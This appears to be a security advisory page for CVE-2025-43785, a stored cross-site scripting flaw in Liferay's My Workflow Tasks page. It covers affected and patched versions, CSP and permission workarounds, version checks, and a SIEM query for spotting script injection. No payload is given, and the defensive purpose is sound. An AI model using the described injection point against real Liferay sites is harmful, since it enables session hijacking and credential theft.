CVE-2025-43785
📋 TL;DR
A stored cross-site scripting (XSS) vulnerability in Liferay Portal and DXP allows attackers to inject malicious scripts into the My Workflow Tasks page. When users view this page, the scripts execute in their browser context, potentially stealing session cookies or performing actions as the user. This affects Liferay Portal 7.4.3.45-7.4.3.128 and multiple DXP versions.
💻 Affected Systems
- Liferay Portal
- Liferay DXP
📦 What is this software?
⚠️ Risk & Real-World Impact
Worst Case
Attackers could steal administrator session cookies, gain administrative access, pivot to internal systems, or deploy ransomware across the organization.
Likely Case
Session hijacking of regular users, credential theft, defacement of workflow pages, or limited data exfiltration from user sessions.
If Mitigated
Script execution blocked by CSP headers, minimal impact with proper input validation and output encoding in place.
🎯 Exploit Status
Exploitation requires authenticated access to inject malicious payload, but payload execution occurs when any user views the compromised page.
🛠️ Fix & Mitigation
✅ Official Fix
Patch Version: Liferay Portal 7.4.3.129+, Liferay DXP 2024.Q2.10+, 2024.Q1.13+, 7.4 update 93+
Vendor Advisory: https://liferay.dev/portal/security/known-vulnerabilities/-/asset_publisher/jekt/content/CVE-2025-43785
Restart Required: No
Instructions:
1. Backup your Liferay instance. 2. Download and apply the appropriate patch from Liferay's customer portal. 3. Verify the patch installation. 4. Test workflow functionality.
🔧 Temporary Workarounds
Implement Content Security Policy (CSP)
allAdd CSP headers to restrict script execution sources and prevent XSS payloads from running.
Add to web.xml or server configuration: Content-Security-Policy: default-src 'self'; script-src 'self'
Disable My Workflow Tasks Page
allTemporarily restrict access to the vulnerable page until patching is complete.
Use Liferay permissions to remove access to My Workflow Tasks for non-essential users
🧯 If You Can't Patch
- Implement strict input validation and output encoding for all user inputs in workflow tasks
- Enable web application firewall (WAF) with XSS protection rules
🔍 How to Verify
Check if Vulnerable:
Check Liferay version via Control Panel > Server Administration > Properties, or examine liferay-portal.xml version attribute.Check Version:
Check Control Panel or examine ${LIFERAY_HOME}/tomcat-9.0.xx/webapps/ROOT/WEB-INF/liferay-portal.xmlVerify Fix Applied:
Verify version is updated to patched version and test XSS payload injection in My Workflow Tasks page.📡 Detection & Monitoring
Log Indicators:
- Unusual script tags or JavaScript in workflow task submissions
- Multiple failed XSS attempts in audit logs
Network Indicators:
- Unexpected script loads from workflow pages
- Suspicious outbound connections from user sessions after viewing workflow tasks
SIEM Query:
source="liferay" AND (message="*script*" OR message="*javascript*") AND uri="*workflow*"